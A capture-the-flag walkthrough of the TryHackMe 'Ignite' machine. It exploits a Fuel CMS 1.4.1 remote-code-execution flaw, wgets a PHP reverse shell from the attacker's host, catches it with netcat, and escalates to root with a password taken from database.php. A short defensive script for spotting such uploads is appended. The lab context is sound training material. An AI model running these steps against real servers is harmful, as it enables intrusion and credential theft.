Hello, in this post I will walk you through the solution to the “Ignite” machine on the TryHackMe platform. Enjoy reading…
Solution
1 — Using Nmap, I gather detailed information about the open ports and services on the machine.
[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.194.181
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-07 21:55 +03
Nmap scan report for 10.10.194.181
Host is up (0.067s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2 — When I visit the HTTP page I see that “Fuel CMS 1.4” is in use, and I look for a suitable exploit in searchsploit.
[root:/home/alper/Desktop/TRYHACKME]# searchsploit "fuel cms"
------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------ ---------------------------------
fuel CMS 1.4.1 - Remote Code Execution (1) | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2) | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3) | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated) | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated) | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated) | php/webapps/48778.txt
Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF) | php/webapps/50884.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
[root:/home/alper/Desktop/TRYHACKME]# searchsploit -m 50477
3 — Using the exploit, I download a PHP reverse shell from my own machine and run it.
[root:/home/alper/Desktop/TRYHACKME]# python3 50477.py -u http://10.10.194.181
[+]Connecting...
Enter Command $ls
systemREADME.md
assets
composer.json
contributing.md
fuel
index.php
robots.txt
Enter Command $wget http://10.8.94.51:8000/shell.php
*
*
*
*
Enter Command $php shell.php
[root:/home/alper/Desktop/TRYHACKME]# nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.194.181 49054
Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
11:58:47 up 6 min, 0 users, load average: 0.41, 0.82, 0.50
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
4 — After the PHP reverse shell connects, I find the first flag in the www-data user's directory.
$ SHELL=/bin/bash script -q /dev/null
www-data@ubuntu:/$ cd /home
cd /home
www-data@ubuntu:/home$ ls
ls
www-data
www-data@ubuntu:/home$ cd www-data
cd www-data
www-data@ubuntu:/home/www-data$ ls
ls
flag.txt
www-data@ubuntu:/home/www-data$ cat flag.txt
cat flag.txt
*CENSORED*
5 — I find the root user's password in database.php inside the “Fuel CMS” directory.
root@ubuntu:/# cd /var/www/html
cd /var/www/html
root@ubuntu:/var/www/html# ls
ls
assets index.php shell.php.1 shell.php.2 shell.php.6
composer.json README.md shell.php.10 shell.php.3 shell.php.7
contributing.md robots.txt shell.php.11 shell.php.4 shell.php.8
fuel shell.php shell.php.12 shell.php.5 shell.php.9
root@ubuntu:/var/www/html# cd fuel
cd fuel
root@ubuntu:/var/www/html/fuel# ls
ls
application data_backup install modules
codeigniter index.php licenses scripts
root@ubuntu:/var/www/html/fuel# cd application
cd application
root@ubuntu:/var/www/html/fuel/application# ls
ls
cache controllers helpers index.html libraries migrations third_party
config core hooks language logs models views
root@ubuntu:/var/www/html/fuel/application# cd config
cd config
root@ubuntu:/var/www/html/fuel/application/config# ls
ls
asset.php editors.php migration.php profiler.php
autoload.php environments.php mimes.php redirects.php
config.php foreign_chars.php model.php routes.php
constants.php google.php MY_config.php smileys.php
custom_fields.php hooks.php MY_fuel_layouts.php social.php
database.php index.html MY_fuel_modules.php states.php
doctypes.php memcached.php MY_fuel.php user_agents.php
root@ubuntu:/var/www/html/fuel/application/config# cat database.php
6 — I switch to the root user and obtain the second flag as well.
www-data@ubuntu:/var/www/html/fuel/application/config$ su
su
Password: *CENSORED*
root@ubuntu:/var/www/html/fuel/application/config# whoami
whoami
root
root@ubuntu:/var/www/html/fuel/application/config# cd /root
cd /root
root@ubuntu:~# ls
ls
root.txt
root@ubuntu:~# cat root.txt
cat root.txt
*CENSORED*
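The web root listing in step 5 shows shell.php next to shell.php.1 through shell.php.12, the numbered copies wget writes when the same file is fetched again, and that pattern is cheap to look for on a server. The script below is an added example, not part of the original write-up; the function names are hypothetical, and treating files owned by the web server account (www-data here) as suspect assumes the site's code is deployed under a different account.

```sh
#!/bin/sh
# Added example, not from the original write-up. Function names are hypothetical.

# find_wget_php_copies DIR
# wget saves a repeated download as name.php.1, name.php.2, ... next to
# name.php. Prints "<copies> <base path>" for every such group under DIR.
find_wget_php_copies() {
    webroot=$1
    [ -d "$webroot" ] || { echo "not a directory: $webroot" >&2; return 2; }
    # The sed -n ... p step keeps only names whose suffix is purely numeric.
    find "$webroot" -type f -name '*.php.[0-9]*' 2>/dev/null |
        sed -n 's/\.php\.[0-9][0-9]*$/.php/p' |
        sort | uniq -c | sed 's/^ *//'
}

# php_owned_by USER DIR
# Lists PHP files (and numbered copies) owned by USER, given as a name or a
# numeric uid. Assumption: application code is deployed under another
# account, so anything owned by the web server account was written through
# the application itself.
php_owned_by() {
    find "$2" -type f \( -name '*.php' -o -name '*.php.[0-9]*' \) \
        -user "$1" 2>/dev/null | sort
}

# Stand-alone use: sh script.sh /var/www/html [www-data]
if [ "$#" -ge 1 ]; then
    echo "== numbered PHP copies =="
    find_wget_php_copies "$1"
    echo "== PHP files owned by ${2:-www-data} =="
    php_owned_by "${2:-www-data}" "$1"
fi
```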